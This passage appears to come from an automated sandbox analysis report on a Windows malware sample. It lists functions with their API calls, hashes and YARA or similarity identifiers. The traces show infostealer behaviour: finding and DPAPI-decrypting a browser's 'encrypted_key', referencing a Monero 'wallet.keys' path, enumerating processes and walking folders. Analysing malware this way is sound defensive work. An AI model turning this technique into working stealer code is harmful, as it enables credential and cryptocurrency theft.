                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 0d9b4415bfcc4d885e54e1e2acf7bea123ea3edb0e2f43f18ac95e336ba59dbc
                  • Instruction ID: 13b322fa1c490fae095cf3b3d76940551c621c6766cbab31d339b35096d0d037
                  • Opcode Fuzzy Hash: 0d9b4415bfcc4d885e54e1e2acf7bea123ea3edb0e2f43f18ac95e336ba59dbc
                  • Instruction Fuzzy Hash: C181EFB19201089BCB14FBA4DD56DFEB338AF14780F504538F60BA6091EF746A29DF62
                  Function 002F70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                  Download Yara Rule
                  Strings
                  • s/, xrefs: 002F7111
                  • s/, xrefs: 002F72AE, 002F7179, 002F717C
                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002F718C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy
                  • String ID: s/$s/$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                  • API String ID: 3722407311-1218915482
                  • Opcode ID: 86d957f8b0354ac769be2803197e70e997e829955587f017158ba3627b4bcbfe
                  • Instruction ID: 47d50220f9ed86271d9c7041711738cc785267d44bfce3b1908347a806e53701
                  • Opcode Fuzzy Hash: 86d957f8b0354ac769be2803197e70e997e829955587f017158ba3627b4bcbfe
                  • Instruction Fuzzy Hash: CE517BB0C2421DABDB14EB90DC95BFEF374AF14340F1041A8E60966181EB746A98CF54
                  Function 002F3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: 4272d0537a965ab5f0de448e066a7377676f4a577232f7b8abebcabc9f84d515
                  • Instruction ID: 5bee3f22a71acd4a6df81619fdbc6319d6b3a354639978de214a0f46b1521de4
                  • Opcode Fuzzy Hash: 4272d0537a965ab5f0de448e066a7377676f4a577232f7b8abebcabc9f84d515
                  • Instruction Fuzzy Hash: CC4142B1D2010DEBCB04EFA4D955AFEF778AF54744F008028E616B6290DB746A19CFA5
                  Function 002E9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002E99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E99EC
                    • Part of subcall function 002E99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002E9A11
                    • Part of subcall function 002E99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002E9A31
                    • Part of subcall function 002E99C0: ReadFile.KERNEL32(000000FF,?,00000000,002E148F,00000000), ref: 002E9A5A
                    • Part of subcall function 002E99C0: LocalFree.KERNEL32(002E148F), ref: 002E9A90
                    • Part of subcall function 002E99C0: CloseHandle.KERNEL32(000000FF), ref: 002E9A9A
                    • Part of subcall function 002F8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002F8E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002E9D39
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9AEF
                    • Part of subcall function 002E9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,002E4EEE,00000000,?), ref: 002E9B01
                    • Part of subcall function 002E9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N.,00000000,00000000), ref: 002E9B2A
                    • Part of subcall function 002E9AC0: LocalFree.KERNEL32(?,?,?,?,002E4EEE,00000000,?), ref: 002E9B3F
                    • Part of subcall function 002E9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002E9B84
                    • Part of subcall function 002E9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 002E9BA3
                    • Part of subcall function 002E9B60: LocalFree.KERNEL32(?), ref: 002E9BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: c0389d4d615502c7c39057412fa86a0aeb01eda9019db6c587ca6b98c96e882e
                  • Instruction ID: ec17767fd2dba595aec0d45389c3a04dad1557dea7b908cb350eb8e45839293e
                  • Opcode Fuzzy Hash: c0389d4d615502c7c39057412fa86a0aeb01eda9019db6c587ca6b98c96e882e
                  • Instruction Fuzzy Hash: D13161B5D2020DABCF04EFE5DC85AEFB7B8AF48304F544569E905A3241E7309A64CBA1
                  Function 002F8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003005B7), ref: 002F86CA
                  • Process32First.KERNEL32(?,00000128), ref: 002F86DE
                  • Process32Next.KERNEL32(?,00000128), ref: 002F86F3
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • CloseHandle.KERNEL32(?), ref: 002F8761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 3dd9f751d1cbc0ba5b7ea2f9642579aeb2f67bb506c1774c9f63147dcd69c649
                  • Instruction ID: fc0c1fd688488dfb6c405906b0a8216933aef9a0dfd70db18174d2906a0b1516
                  • Opcode Fuzzy Hash: 3dd9f751d1cbc0ba5b7ea2f9642579aeb2f67bb506c1774c9f63147dcd69c649
                  • Instruction Fuzzy Hash: 19316DB192121CABCB24EF50CC45FEEF778EF45780F1041A9E20EA61A0DB706A55CFA1
                  Function 002F7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00300E00,00000000,?), ref: 002F79B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F79B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00300E00,00000000,?), ref: 002F79C4
                  • wsprintfA.USER32 ref: 002F79F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 41fe66bd3db795dd068ff0a0abc40ea33a6333dd98b0558ba5612fcd865f8d4d
                  • Instruction ID: 660e2df9dcc4ed907f3e750b1a52b9a8c47ca6e6a974e0aee0e70a0a515e2382
                  • Opcode Fuzzy Hash: 41fe66bd3db795dd068ff0a0abc40ea33a6333dd98b0558ba5612fcd865f8d4d
                  • Instruction Fuzzy Hash: 861127B2904118ABCB24DFC9DD45BBEB7F8FB4DB11F10421AF605A2280E3795945DBB1
                  Function 002FC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 002FC74E
                    • Part of subcall function 002FBF9F: __amsg_exit.LIBCMT ref: 002FBFAF
                  • __getptd.LIBCMT ref: 002FC765
                  • __amsg_exit.LIBCMT ref: 002FC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002FC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 44bb7346a742c85d3333af831ffd58d02ad0e505a62c41818054c1846f40f697
                  • Instruction ID: 87a673a6930a08de35576da50e02d47d68433ec0f5c55eeffe31898b222eb590
                  • Opcode Fuzzy Hash: 44bb7346a742c85d3333af831ffd58d02ad0e505a62c41818054c1846f40f697
                  • Instruction Fuzzy Hash: 31F0F63292530D9BD7227F789D02B79F3A45F007A0F300279F304A61D2CB641860DE46
                  Function 002F4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002F8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002F8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002F4F7A
                  • lstrcat.KERNEL32(?,00301070), ref: 002F4F97
                  • lstrcat.KERNEL32(?,01328B90), ref: 002F4FAB
                  • lstrcat.KERNEL32(?,00301074), ref: 002F4FBD
                    • Part of subcall function 002F4910: wsprintfA.USER32 ref: 002F492C
                    • Part of subcall function 002F4910: FindFirstFileA.KERNEL32(?,?), ref: 002F4943
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FDC), ref: 002F4971
                    • Part of subcall function 002F4910: StrCmpCA.SHLWAPI(?,00300FE0), ref: 002F4987
                    • Part of subcall function 002F4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002F4B7D
                    • Part of subcall function 002F4910: FindClose.KERNEL32(000000FF), ref: 002F4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: 25bac686a29cb21ccbed0e90577df9d44f60540450b50faae1d35b710ebf4905
                  • Instruction ID: 338f8481492a2377ef499f07eb337a81d277ed33cc70bdc2c698872876cab0c8
                  • Opcode Fuzzy Hash: 25bac686a29cb21ccbed0e90577df9d44f60540450b50faae1d35b710ebf4905
                  • Instruction Fuzzy Hash: 4121C876A1020867CB64FB70DC56EEE733CAF65300F404554F65992181EEB49ADD8F92